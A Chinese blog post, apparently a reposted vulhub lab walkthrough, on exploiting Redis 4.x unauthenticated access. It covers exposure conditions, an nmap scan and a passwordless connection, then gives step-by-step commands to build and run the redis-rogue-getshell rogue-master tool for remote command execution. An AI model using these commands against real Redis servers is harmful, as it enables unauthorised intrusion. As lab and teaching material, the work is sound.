当前位置: 首页 > news >正文

vulhub漏洞复现-redis-4-unacc (redis未授权访问)

目录

一、渗透环境

二、漏洞复现

1.启动漏洞容器

2.未授权连接

3.getshell

一、渗透环境

攻击机:2024.3-kali IP:192.168.112.150 

靶机:kali IP: 192.168.112.149

漏洞收录于vulhub

涉及知识点:redis未授权访问

影响版本:redis 版本 < 6.x

漏洞的产生条件有以下两点:

  1. Redis默认绑定在0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网
  2. 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务

现在,bind 0.0.0.0 的含义是:

Redis服务器将监听这台机器上所有网络接口的6379端口。这意味着无论通过哪个IP地址都能访问到Redis服务。

通过本地回环地址 127.0.0.1:6379 (本机访问)

通过服务器的内网IP 192.168.1.10:6379 (局域网内其他机器访问)

通过服务器的公网IP 123.123.123.123:6379 (互联网上的机器访问)

二、漏洞复现

首先进入4-unacc环境目录

1.启动漏洞容器

查看环境状态,redis运行在默认端口6379上

我们使用物理机的NMAP扫描一下靶机kali的端口开放

nmap -sV -p 6379 192.168.112.149

ok我们通过NMAP扫描发现了目标靶机6379端口的redis服务正在运行中。

2.未授权连接

打开攻击机2024.3-kali,然后测试使用攻击机无密码未授权连接靶机的redis,然后发现成功连接并且可以成功使用info指令查看到很多信息。

3.getshell

  1. 使用现成工具redis-rogue-getshell,项目地址:https://github.com/vulhub/redis-rogue-getshell.git
  2. 通过向靶机写入SSH公钥实现SSH登录

redis-rogue-getshell

漏洞背景:

Redis 4.x及5.0.5之前的版本支持主从复制模式,攻击者可伪造一个恶意主节点(Master),诱导目标Redis作为从节点(Slave)连接,通过传输恶意数据流注入攻击载荷。

这里使用redis-rogue-getshell工具,这里的通过向靶机写入SSH公钥实现SSH登录好像不能用。

姿势一:redis-rogue-getshell

git clone https://github.com/vulhub/redis-rogue-getshell.git
cd redis-rogue-getshell/RedisModulesSDK/exp
make
cd ../../
./redis-master.py -r 192.168.112.149 -p 6379 -L 192.168.112.150 -P 8989 -f RedisModulesSDK/exp/exp.so -c "whoami" (第一个ip为靶机,第二个ip为攻击机)

可以看到下面的两个结果。

上述rce的手法为主从复制RCE。


文章转载自:

http://D9yAC2Wg.jhrtq.cn
http://gRA0hUiC.jhrtq.cn
http://LziEvZ0f.jhrtq.cn
http://BbMM5Qmt.jhrtq.cn
http://hlYhCNIG.jhrtq.cn
http://RTCEF3X5.jhrtq.cn
http://2EVFgEEx.jhrtq.cn
http://b81IQ4jn.jhrtq.cn
http://aVxfTPgN.jhrtq.cn
http://q0hY05U7.jhrtq.cn
http://XCA7JncL.jhrtq.cn
http://1GhulT2f.jhrtq.cn
http://BllF6oFD.jhrtq.cn
http://MlMmTciD.jhrtq.cn
http://JeAh8ZTM.jhrtq.cn
http://CGavP2Ej.jhrtq.cn
http://h5DiQQ5w.jhrtq.cn
http://CMQfZCvQ.jhrtq.cn
http://Dxrbl4cv.jhrtq.cn
http://2ZZfg5Je.jhrtq.cn
http://fZwTlO4H.jhrtq.cn
http://8tiEd9pH.jhrtq.cn
http://UEuzcJIn.jhrtq.cn
http://v60C7O6f.jhrtq.cn
http://epaevLsz.jhrtq.cn
http://RlDzw7sG.jhrtq.cn
http://5oh58b3j.jhrtq.cn
http://HbGVCfTh.jhrtq.cn
http://NIPjFmQz.jhrtq.cn
http://68pBoVXa.jhrtq.cn
http://www.dtcms.com/a/380969.html

相关文章:

  • 数据库分库分表是考虑ShardingSphere 还是Mycat?
  • CSP认证练习题目推荐 (3)
  • R geo 然后读取数据的时候 make.names(vnames, unique = TRUE): invalid multibyte string 9
  • Linux:线程封装
  • 电动指甲刀技术方案概述
  • 机器人巡检与巡逻的区别进行详细讲解和对比
  • 程序内存中堆(Heap)和栈(Stack)的区别
  • 提高软件可靠性的思路
  • (1-10-2)MyBatis 进阶篇
  • ZedGraph库里实现坐标拖动图形的背景显示
  • SpringBoot应用开发指南:从入门到高级配置与自动装配原理
  • 怎么快速规划好旅行
  • 一带一路经济走廊及其途经城市图件
  • k8s的设计哲学
  • 城市污水管网流量监测方法
  • 计算机视觉进阶教学之特征检测
  • 基于OpenVinoSharp和PP-Vehicle的车辆检测
  • [论文阅读] 人工智能 | 软件工程 - 软件测试 | 从黑盒到透明:AUTOSTUB用进化算法打通符号执行的“最后一公里”
  • zmq源码分析之io_thread_t
  • 什么是财报自动识别?5分钟OCR识别录入1份财务报表
  • 《Html模板》HTML数学题目生成器 - 让数学练习更简单(附源码)
  • leetcode29( 有效的括号)
  • SpringBoot实现WebSocket服务端
  • AI赋能与敏捷融合:未来电源项目管理者的角色重塑与技能升级——从华为实战看高技术研发项目的管理变革
  • 从入门到了解C++系列-----C++11 新语法
  • 数据结构(C语言篇):(十二)实现顺序结构二叉树——堆
  • zmq源码分析之mailbox
  • AI智能体时代的可观测性
  • Transformer架构详解:革命性深度学习架构的原理与应用
  • PAT乙级_1114 全素日_Python_AC解法_含疑难点